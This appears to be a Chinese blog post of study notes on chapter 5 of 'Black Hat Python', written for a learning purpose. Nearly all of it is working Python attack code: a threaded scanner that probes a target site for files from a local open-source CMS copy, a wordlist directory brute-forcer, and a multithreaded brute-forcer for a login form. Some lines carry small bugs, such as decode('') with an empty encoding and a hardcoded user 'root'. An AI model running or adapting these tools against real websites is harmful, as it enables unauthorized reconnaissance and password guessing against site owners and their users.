python黑帽子(第五章)

对开源CMS进行扫描

import os
import queue
import requests  # 原书编写时间过于久远 现在有requests库对已经对原来的库进行封装 更容易调用
import threading

# 设置线程
threads = 10
# 指定网站
target = ""
# 指定本地扫描路径
directory = ""
# 无效文件的后缀
filters = [".jpg", ".gif", ".png", ".css"]

# 切换路径
os.chdir(directory)
# 实例化queue
web_paths = queue.Queue()

# 在当前目录下进行遍历目录或文件  r:当前路径   d:当前路径下的子目录  f:当前路径下的文件
for r, d, f in os.walk("."):
    for files in f:
        remote_path = "%s%s" % (r, files)
        # 将以“.”开头的文件，去掉“.”    .\web\xxxx.php
        if remote_path.startswith("."):
            remote_path = remote_path[1:]
        # 排除后缀后，将其文件名压入队列
        if os.path.splitext(files)[1] not in filters:
            web_paths.put(remote_path)

# 构建URL，爆破网站目录
def test_remote():
    while not web_paths.empty():
        path = web_paths.get()
        url = "%s%s" % (target, path)

        try:
            res = requests.get(url)
            print("[%d] => %s" % (res.status_code, path))
            res.close()

        except Exception as err:
            # print(err)
            pass

# 开启多线程
for i in range(threads):
    print("Spawning thread: %d" % i)
    t = threading.Thread(target=test_remote)
    t.start()

暴力破解目录和文件位置

import requests
import threading
import queue

target = ""
threads = 20
dic = ""

# 读取字典中的数据，并格式化后发送
def dic_line(dic):
    txt = open(dic, 'rb')
    raw_words = txt.readlines()
    words = queue.Queue()
    txt.close()
    for word in raw_words:
        word = word.rstrip()
        words.put(word)
    return words

# 构造相应的url，对服务器进行爆破
def dir_line(dic_queue):
    while not dic_queue.empty():
        attempt = dic_queue.get().decode('')
        url = "%s%s" % (target, attempt)
        try:
            header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36'}
            response = requests.get(url, headers=header)
            if response.status_code != 404:
                print("[%d] => %s" % (response.status_code, url))
        except requests.RequestException as e:
            print(e)
            pass

if __name__ == '__main__':
    wordlist = dic_line(dic)
    for i in range(threads):
        t = threading.Thread(target=dir_line, args=(wordlist, ))
        t.start()

暴力破解HTML表格验证

import queue
import requests
import threading

user_thread = 10
username = ""
wordlist_file = ""
target_url = ""
success_check = ""

# 定义类
class Bruter(object):
    # 初始化时需传参，接受用户名，密码参数
    def __init__(self, username, words):
        self.username = username
        self.password_q = words
        self.found = False
        print("Finished setting up for: %s" % username)

    # 定义类中多线程方法
    def run_bruteforce(self):
        for i in range(user_thread):
            t = threading.Thread(target=self.web_bruter)
            t.start()

    # 定义构造http请求包方法
    def web_bruter(self):
        while not self.password_q.empty() and not self.found:
            brute = self.password_q.get().rstrip()
            post_tags = {'log': 'root', 'pwd': brute}
            print("\b\b"*100, end="")
            print("\rTrying: %s : %s (%d left)" % (self.username, brute.decode('utf-8'), self.password_q.qsize()), end="")
            login_response = requests.post(target_url, data=post_tags)
            login_result = login_response.text
            if success_check not in login_result:
                self.found = True
                print("\n[*] Bruteforce successful.")
                print("[*] Username: %s" % username)
                print("[*] Password: %s" % brute.decode('utf-8'))
                print("[*] Waiting for other th"
                      "reads to exit...")

# 定义列举密码并发送函数
def build_wordlist(wordlist_file):
    fd = open(wordlist_file, "rb")
    raw_words = fd.readlines()
    fd.close()

    words = queue.Queue()

    for word in raw_words:
        word = word.rstrip()
        words.put(word)
    return words

# 运用
words = build_wordlist(wordlist_file)
bruter_obj = Bruter(username, words)
bruter_obj.run_bruteforce()